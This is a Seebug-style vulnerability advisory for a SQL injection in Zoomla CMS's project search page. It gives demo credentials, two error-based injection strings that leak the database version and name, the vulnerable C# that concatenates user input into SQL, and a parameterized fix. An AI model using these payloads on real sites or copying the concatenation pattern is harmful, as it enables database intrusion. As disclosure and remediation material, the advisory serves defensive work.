逐浪CMS (Zoomla CMS) SQL Injection

2014-08-06T00:00:00
ID SSV:94214
Type seebug
Reporter Root
Modified 2014-08-06T00:00:00

Description

Brief description:

SQL injection in the latest version of 逐浪CMS

Detailed description:

Visit

http://demo.zoomla.cn/User/login.aspx

and log in as test123 / 111111, then visit

http://demo.zoomla.cn/User/PrintServer/Project/ProjectList.aspx

Enter the following in the keyword field:

1' and (select @@version)>0--

[Screenshot 73.png: https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png]

Click Search.

[Screenshot 74.png: https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png]

Enter:

1' and (select db_name())>0--

[Screenshot 75.png: https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png]

The key code is as follows:

    protected void Search_Click(object sender, EventArgs e)
    {
        string keyWord = this.SearchValue.Text.Trim(); // not sanitized
        int type = DataConverter.CLng(this.DLType.SelectedValue);
        DataView defaultView = this.bll.ProjectSearch(type, keyWord).DefaultView; // follow this call
        this.Egv.DataSource = defaultView;
        this.Egv.DataKeyNames = new string[] { "ProjectID" };
        this.Egv.DataBind();
    }

    public DataTable ProjectSearch(int Type, string KeyWord)
    {
        string str = string.Empty;
        switch (Type)
        {
            case 0:
                str = "ProjectName like '%" + KeyWord + "%'";
                break;
            case 1:
                str = "StartDate like '%" + KeyWord.Trim() + "%'";
                break;
            case 2:
                str = "ProjectID=" + KeyWord;
                break;
            case 3:
                str = "ProjectIntro like '%" + KeyWord + "%'";
                break;
            case 4:
                str = " UserID in (select UserID from ZL_User where UserName like '%" + KeyWord + "%')";
                break;
            default:
                str = "ProjectName like '%" + KeyWord + "%'";
                break;
        }
        // KeyWord is concatenated straight into the SQL text in every branch: injectable
        string cmdText = "select * from [ZL_Project] where " + str;
        return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null);
    }
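As an added example that is not part of the original report or of 逐浪CMS's own code, the same search rewritten with parameterized queries on System.Data.SqlClient instead of the project's SqlHelper; the connectionString parameter and the 200-character keyword length are assumptions:

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
// Hardened replacement for ProjectSearch (added example, not Zoomla's own code): the
// column name comes from a fixed switch and the keyword only travels as a SqlParameter.
public static class ProjectSearchSafe
{
    public static DataTable Search(string connectionString, int type, string keyWord)
    {
        string where;
        var kw = new SqlParameter("@kw", SqlDbType.NVarChar, 200); // 200 = assumed max length
        switch (type)
        {
            case 1:
                where = "StartDate like @kw";
                kw.Value = "%" + keyWord.Trim() + "%";
                break;
            case 2:
                // Numeric column: parse as int instead of concatenating the raw string.
                int id;
                if (!int.TryParse(keyWord, out id)) return new DataTable();
                where = "ProjectID = @kw";
                kw = new SqlParameter("@kw", SqlDbType.Int) { Value = id };
                break;
            case 3:
                where = "ProjectIntro like @kw";
                kw.Value = "%" + keyWord + "%";
                break;
            case 4:
                where = "UserID in (select UserID from ZL_User where UserName like @kw)";
                kw.Value = "%" + keyWord + "%";
                break;
            default: // case 0 and any unexpected type fall back to ProjectName
                where = "ProjectName like @kw";
                kw.Value = "%" + keyWord + "%";
                break;
        }
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand("select * from [ZL_Project] where " + where, conn))
        {
            cmd.Parameters.Add(kw);
            var table = new DataTable();
            new SqlDataAdapter(cmd).Fill(table); // Fill opens and closes the connection itself
            return table;
        }
    }
}
```

With the keyword bound as a parameter, input such as `1' and (select @@version)>0--` is matched as a literal substring rather than executed; `%` and `_` in the keyword still act as LIKE wildcards, which affects matching but not query structure.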

Proof of vulnerability:

See the proof above.